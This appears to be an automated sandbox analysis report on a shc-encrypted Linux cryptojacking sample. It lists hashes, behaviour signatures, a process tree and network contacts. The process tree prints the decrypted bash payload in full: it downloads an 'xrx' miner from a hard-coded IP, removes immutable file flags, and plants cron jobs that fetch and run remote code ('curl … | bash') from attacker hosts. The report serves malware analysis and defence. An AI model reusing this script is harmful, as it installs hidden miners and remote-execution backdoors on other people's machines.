Resubmissions

02/12/2024, 02:52 UTC

241202-dcyx7s1lfk 10

Analysis

  • max time kernel
    132s
  • max time network
    145s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
  • submitted
    02/12/2024, 02:52 UTC

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Attempts to change immutable files 2 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    PID:2442
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      PID:2442
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        PID:2442
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          • File and Directory Permissions Modification
          PID:2442
          • /usr/bin/pgrep
            pgrep xrx
            • Reads CPU attributes
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:2444
          • /usr/bin/ls
            ls -l /var/tmp/.xrx/xrx
            PID:2446
          • /usr/bin/awk
            awk "{print \$5}"
            PID:2447
          • /usr/bin/mkdir
            mkdir /var/tmp/.xrx
            PID:2448
          • /usr/bin/chattr
            chattr -ia /var/tmp/.xrx/xrx
            • Attempts to change immutable files
            PID:2449
          • /usr/bin/chattr
            chattr -ia /var/tmp/.xrx/config.json
            • Attempts to change immutable files
            PID:2450
          • /usr/bin/rm
            rm -rf /var/tmp/.xrx/xrx
            PID:2451
          • /usr/bin/rm
            rm -rf /var/tmp/.xrx/config.json
            PID:2452
          • /usr/bin/curl
            curl -L -O http://185.252.178.82:6972/xrx/xrx
            PID:2453
          • /usr/bin/wget
            wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
            PID:2497

Network

  No results found
  • 185.252.178.82:6972
    660 B
    11
  • 185.252.178.82:6972
    480 B
    8
  • 224.0.0.251:5353
    146 B
    2

MITRE ATT&CK Enterprise v15
